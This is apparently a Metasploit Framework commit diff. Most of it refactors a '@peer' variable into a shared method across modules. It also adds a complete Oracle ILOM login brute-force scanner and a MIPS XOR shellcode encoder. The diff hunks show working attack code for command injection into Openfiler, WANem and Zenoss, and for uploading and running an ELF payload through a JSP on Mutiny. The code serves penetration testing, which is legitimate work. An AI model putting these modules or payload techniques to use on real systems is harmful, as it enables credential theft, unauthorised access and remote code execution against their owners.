vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"") vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
return return
end end
end end
@ -117,10 +117,9 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = target_uri.path @uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)
} }
end end

21
modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
View File

@ -47,18 +47,17 @@ class Metasploit4 < Msf::Auxiliary
end end
def run_host(ip) def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface") print_status("#{peer} - Connecting to SiteScope SOAP Interface")
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl", 'uri' => "#{@uri}services/APISiteScopeImpl",
'method' => 'GET'}) 'method' => 'GET'})
if not res if not res
print_error("#{@peer} - Unable to connect") print_error("#{peer} - Unable to connect")
return return
end end
@ -66,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
end end
def accessfile def accessfile
print_status("#{@peer} - Retrieving the target hostname") print_status("#{peer} - Retrieving the target hostname")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n" data << "<wsns0:Envelope" + "\r\n"
@ -108,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary
end end
if not host_name or host_name.empty? if not host_name or host_name.empty?
print_error("#{@peer} - Failed to retrieve the host name") print_error("#{peer} - Failed to retrieve the host name")
return return
end end
print_status("#{@peer} - Retrieving the file contents") print_status("#{peer} - Retrieving the file contents")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n" data << "<wsns0:Envelope" + "\r\n"
@ -153,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1 boundary = $1
end end
if not boundary or boundary.empty? if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
return return
end end
@ -161,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1 cid = $1
end end
if not cid or cid.empty? if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
return return
end end
@ -169,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1) loot = Rex::Text.ungzip($1)
end end
if not loot or loot.empty? if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
return return
end end
f = ::File.basename(datastore['RFILE']) f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}") print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return return
end end
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
end end
end end

19
modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
View File

@ -48,11 +48,10 @@ class Metasploit4 < Msf::Auxiliary
end end
def run_host(ip) def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface") print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl') uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -61,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'}) 'method' => 'GET'})
if not res if not res
print_error("#{@peer} - Unable to connect") print_error("#{peer} - Unable to connect")
return return
end end
@ -85,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>" data << "</wsns0:Envelope>"
print_status("#{@peer} - Retrieving the SiteScope Configuration") print_status("#{peer} - Retrieving the SiteScope Configuration")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl') uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -104,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1 boundary = $1
end end
if not boundary or boundary.empty? if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return return
end end
@ -112,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1 cid = $1
end end
if not cid or cid.empty? if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return return
end end
@ -120,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1) loot = Rex::Text.ungzip($1)
end end
if not loot or loot.empty? if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return return
end end
path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
print_status("#{@peer} - HP SiteScope Configuration saved in #{path}") print_status("#{peer} - HP SiteScope Configuration saved in #{path}")
print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data") print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data")
return return
end end
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
end end
end end

13
modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
View File

@ -47,11 +47,10 @@ class Metasploit4 < Msf::Auxiliary
end end
def run_host(ip) def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface") print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APIMonitorImpl') uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -60,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'}) 'method' => 'GET'})
if not res if not res
print_error("#{@peer} - Unable to connect") print_error("#{peer} - Unable to connect")
return return
end end
@ -89,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n"
print_status("#{@peer} - Retrieving the file contents") print_status("#{peer} - Retrieving the file contents")
uri = normalize_uri(@uri, 'services/APIMonitorImpl') uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -105,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
loot = CGI.unescapeHTML($1) loot = CGI.unescapeHTML($1)
if not loot or loot.empty? if not loot or loot.empty?
print_status("#{@peer} - Retrieved empty file") print_status("#{peer} - Retrieved empty file")
return return
end end
f = ::File.basename(datastore['RFILE']) f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}") print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return return
end end
print_error("#{@peer} - Failed to retrieve the file") print_error("#{peer} - Failed to retrieve the file")
end end
end end

4
modules/auxiliary/scanner/http/openmind_messageos_login.rb
View File

@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info, super(update_info(info,
'Name' => 'OpenMind Message-OS Portal Login Brute Force Utility', 'Name' => 'OpenMind Message-OS Portal Login Brute Force Utility',
'Description' => %{ 'Description' => %{
This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force This module scans for OpenMind Message-OS provisioning web login portal, and
to identify valid credentials. performs a login brute force attack to identify valid credentials.
}, },
'Author' => 'Author' =>
[ [

115
modules/auxiliary/scanner/http/oracle_ilom_login.rb Normal file
View File

@ -0,0 +1,115 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle ILO Manager Login Brute Force Utility',
'Description' => %{
This module scans for Oracle Integrated Lights Out Manager (ILO) login portal, and
performs a login brute force attack to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443)
], self.class)
end
def run_host(ip)
unless is_app_oilom?
return
end
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the target actually isn't Oracle ILOM
#
def is_app_oilom?
begin
res = send_request_cgi(
{
'uri' => '/iPages/i_login.asp',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
vprint_error("#{peer} - HTTP Connection Failed...")
return false
end
if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager"))
vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...")
return true
else
vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.")
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/iPages/loginProcessor.asp',
'method' => 'POST',
'vars_post' =>
{
'sclink' => '',
'username' => user,
'password' => pass,
'button' => 'Log+In'
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed...")
return :abort
end
if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString"))
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Oracle Integrated Lights Out Manager Portal',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
end
end

9
modules/auxiliary/scanner/http/vcms_login.rb
View File

@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
'cookie' => sid 'cookie' => sid
}) })
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond") vprint_error("#{peer} - Service failed to respond")
return :abort return :abort
end end
@ -86,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
when /User name already confirmed/ when /User name already confirmed/
return :skip_user return :skip_user
when /Invalid password/ when /Invalid password/
vprint_status("#{@peer} - Username found: #{user}") vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/ else /\<a href="process\.php\?logout=1"\>/
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"") print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({ report_auth_info({
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -108,10 +108,9 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)
} }
end end

146
modules/encoders/mipsbe/byte_xori.rb Normal file
View File

@ -0,0 +1,146 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Encoder::Xor
Rank = NormalRanking
def initialize
super(
'Name' => 'Byte XORi Encoder',
'Description' => %q{
Mips Web server exploit friendly xor encoder. This encoder has been found useful on
situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS
architectures, this one is based on the xori instruction.
},
'Author' =>
[
'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
'juan vazquez' # byte_xori encoder
],
'Arch' => ARCH_MIPSBE,
'License' => MSF_LICENSE,
'Decoder' =>
{
'KeySize' => 1,
'BlockSize' => 1,
'KeyPack' => 'C',
})
end
#
# Returns the decoder stub that is adjusted for the size of the buffer
# being encoded.
#
def decoder_stub(state)
# add 4 number of passes for the space reserved for the key, at the end of the decoder stub
# (see commented source)
number_of_passes=state.buf.length+4
raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766
# 16-bits not (again, see also commented source)
reg_14 = (number_of_passes+1)^0xFFFF
decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
main:
li macro reg, imm
addiu reg, $0, imm ; 0x24xxyyyy - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff
endm
li ($14, #{reg_14}) ; 0x240exxxx - store in $14 the number of passes (two's complement) - xxxx (number of passes)
nor $14, $14, $0 ; 0x01c07027 - get in $14 the number of passes
li ($11,-69) ; 0x240bffbb - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)
; acts as getpc
next:
bltzal $8, next ; 0x0510ffff - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.
slti $8, $0, 0x#{slti_imm(state)} ; 0x2808xxxx - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm
nor $11, $11, $0 ; 0x01605827 - get in $11 the offset to the end of the decoder (from the addu instr)
addu $25, $31, $11 ; 0x03ebc821 - get in $25 a pointer to the end of the decoder stub
slti $23, $0, 0x#{slti_imm(state)} ; 0x2817xxxx - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm
lb $17, -1($25) ; 0x8f31fffc - Load xor key in $17 (stored on the last byte of the decoder stub)
; Init $6 and $15
li ($13, -4) ; 0x240dfffc - $13 = -4
nor $6, $13, $0 ; 0x01a03027 - $6 = 3 ; used to easily get the cacheflush parameter
addi $15, $6, -2 ; 0x20cffffe - $15 = 1 ($15 = decoding loop counter increment)
; In order avoid null bytes, decode also the xor key, so memory can be
; referenced with offset -1
loop:
lb $8, -4($25) ; 0x8f28fffc - Load in $8 the byte to decode
addu $23, $23, $15 ; 0x02efb821 - Increment the counter ($23)
xori $3, $8, 0x#{padded_key(state)} ; 0x01111826 - xori decoding instruction, store the decoded byte on $3
#{set_on_less_than(state)} ; 0x02eef0xx - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt
sb $3, -4($25) ; 0xaf23fffc - Store decoded byte on memory
bne $0, $30, loop ; 0x17c0fff9 - branch to loop if $30 != 0 (ranch while bytes to decode)
addu $25, $25, $15 ; 0x032dc821 - next instruction to decode, executed because of the pipelining
li ($2, 4147) ; 0x24021033 - cacheflush sytem call
syscall 0x52950 ; 0x014a540c
nop ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop
EOS
return decoder
end
def padded_key(state, size=1)
key = Rex::Text.rand_text(size, state.badchars)
key << [state.key].pack("C")
return key.unpack("n")[0].to_s(16)
end
# Returns an two-bytes immediate value without badchars. The value must be
# on the 0x8000-0x8fff so it is used as negative value by slti (set less
# than signed immediate)
def slti_imm(state)
imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack("C*"))
return imm.unpack("n")[0].to_s(16)
end
# Since 0x14 contains the number of passes, and because of the li macro, can't be
# longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used
# here
def set_on_less_than(state)
instructions = {
"sltu $30, $23, $14" => "\x02\xee\xf0\x2b", # set less than unsigned
"slt $30, $23, $14" => "\x02\xee\xf0\x2a" # set less than
}
instructions.each do |k,v|
if Rex::Text.badchar_index(v, state.badchars) == nil
return k
end
end
raise BadcharError.new,
"The #{self.name} encoder failed to encode the decoder stub without bad characters.",
caller
end
def encode_finalize_stub(state, stub)
# Including the key into the stub by ourselves because it should be located
# in the last 4 bytes of the decoder stub. In this way decoding will convert
# these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports
# one decoder_key_offset position
real_key = state.key
stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
return stub
end
end

4
modules/exploits/linux/http/astium_sqli_upload.rb
View File

@ -48,10 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def peer
return "#{rhost}:#{rport}"
end
def uri def uri
return target_uri.path return target_uri.path
end end

18
modules/exploits/linux/http/mutiny_frontend_upload.rb
View File

@ -140,40 +140,38 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to login")
print_status("#{@peer} - Trying to login")
if login if login
print_good("#{@peer} - Login successful") print_good("#{peer} - Login successful")
else else
fail_with(Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options") fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options")
end end
exploit_native exploit_native
end end
def exploit_native def exploit_native
print_status("#{@peer} - Uploading executable Payload file") print_status("#{peer} - Uploading executable Payload file")
elf = payload.encoded_exe elf = payload.encoded_exe
elf_location = "/tmp" elf_location = "/tmp"
elf_filename = "#{rand_text_alpha_lower(8)}.elf" elf_filename = "#{rand_text_alpha_lower(8)}.elf"
if upload_file(elf_location, elf_filename, elf) if upload_file(elf_location, elf_filename, elf)
register_files_for_cleanup("#{elf_location}/#{elf_filename}") register_files_for_cleanup("#{elf_location}/#{elf_filename}")
else else
fail_with(Failure::Unknown, "#{@peer} - Payload upload failed") fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end end
print_status("#{@peer} - Uploading JSP to execute the payload") print_status("#{peer} - Uploading JSP to execute the payload")
jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
if upload_file(jsp_location, jsp_filename, jsp) if upload_file(jsp_location, jsp_filename, jsp)
register_files_for_cleanup("#{jsp_location}/#{jsp_filename}") register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
else else
fail_with(Failure::Unknown, "#{@peer} - JSP upload failed") fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end end
print_status("#{@peer} - Executing payload") print_status("#{peer} - Executing payload")
send_request_cgi( send_request_cgi(
{ {
'uri' => normalize_uri(target_uri.path, "m", jsp_filename), 'uri' => normalize_uri(target_uri.path, "m", jsp_filename),

9
modules/exploits/linux/http/netgear_readynas_exec.rb
View File

@ -15,10 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'NETGEAR ReadyNAS Perl Code Evaluation', 'Name' => 'NETGEAR ReadyNAS Perl Code Evaluation',
'Description' => %q{ 'Description' => %q{
This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
vulnerability exists on the web fronted, specifically on the np_handler.pl component, vulnerability exists on the web front end, specifically in the np_handler.pl component,
due to the insecure usage of the eval() perl function. This module has been tested due to an insecure usage of the eval() perl function. This module has been tested
successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.
hardware.
}, },
'Author' => 'Author' =>
[ [
@ -49,6 +48,8 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Targets' => 'Targets' =>
[ [
# Tested on an emulated environment, need to check this
# against a real device
[ 'NETGEAR ReadyNAS 4.2.23', { }] [ 'NETGEAR ReadyNAS 4.2.23', { }]
], ],
'DefaultOptions' => 'DefaultOptions' =>

13
modules/exploits/linux/http/openfiler_networkcard_exec.rb
View File

@ -69,11 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page # retrieve software version from login page
print_status("#{@peer} - Sending check") print_status("#{peer} - Sending check")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/' 'uri' => '/'
@ -86,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
@ -98,14 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("&#{payload.raw}&") cmd = Rex::Text.uri_encode("&#{payload.raw}&")
# send payload # send payload
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)") print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => "/admin/system.html?step=2&device=lo#{cmd}", 'uri' => "/admin/system.html?step=2&device=lo#{cmd}",
@ -116,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/ if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed') fail_with(Failure::NoAccess, 'Authentication failed')
else else

14
modules/exploits/linux/http/wanem_exec.rb
View File

@ -65,12 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
data = "pc=127.0.0.1; " data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}") data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26" data << "%26"
print_status("#{@peer} - Sending check") print_status("#{peer} - Sending check")
begin begin
res = send_request_cgi({ res = send_request_cgi({
@ -79,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data 'data' => data
}, 25) }, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
@ -91,11 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; " data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode(payload.raw) data << Rex::Text.uri_encode(payload.raw)
data << "%26" data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)") print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/WANem/result.php', 'uri' => '/WANem/result.php',
@ -103,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data 'data' => data
}, 25) }, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
if res and res.code == 200 if res and res.code == 200
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
else else
print_error("#{@peer} - Sending payload failed") print_error("#{peer} - Sending payload failed")
end end
end end

11
modules/exploits/linux/http/zen_load_balancer_exec.rb
View File

@ -65,11 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from config file # retrieve software version from config file
print_status("#{@peer} - Sending check") print_status("#{peer} - Sending check")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/config/global.conf' 'uri' => '/config/global.conf'
@ -82,15 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
auth = Rex::Text.encode_base64("#{user}:#{pass}") auth = Rex::Text.encode_base64("#{user}:#{pass}")
@ -98,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
lines = rand(100) + 1 lines = rand(100) + 1
# send payload # send payload
print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)") print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}", 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",

17
modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
View File

@ -63,9 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page # retrieve software version from login page
begin begin
res = send_request_raw({ res = send_request_raw({
@ -76,22 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME'] username = datastore['USERNAME']
password = datastore['PASSWORD'] password = datastore['PASSWORD']
command = URI.encode(payload.encoded)+"%26" command = URI.encode(payload.encoded)+"%26"
postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
# send payload # send payload
print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
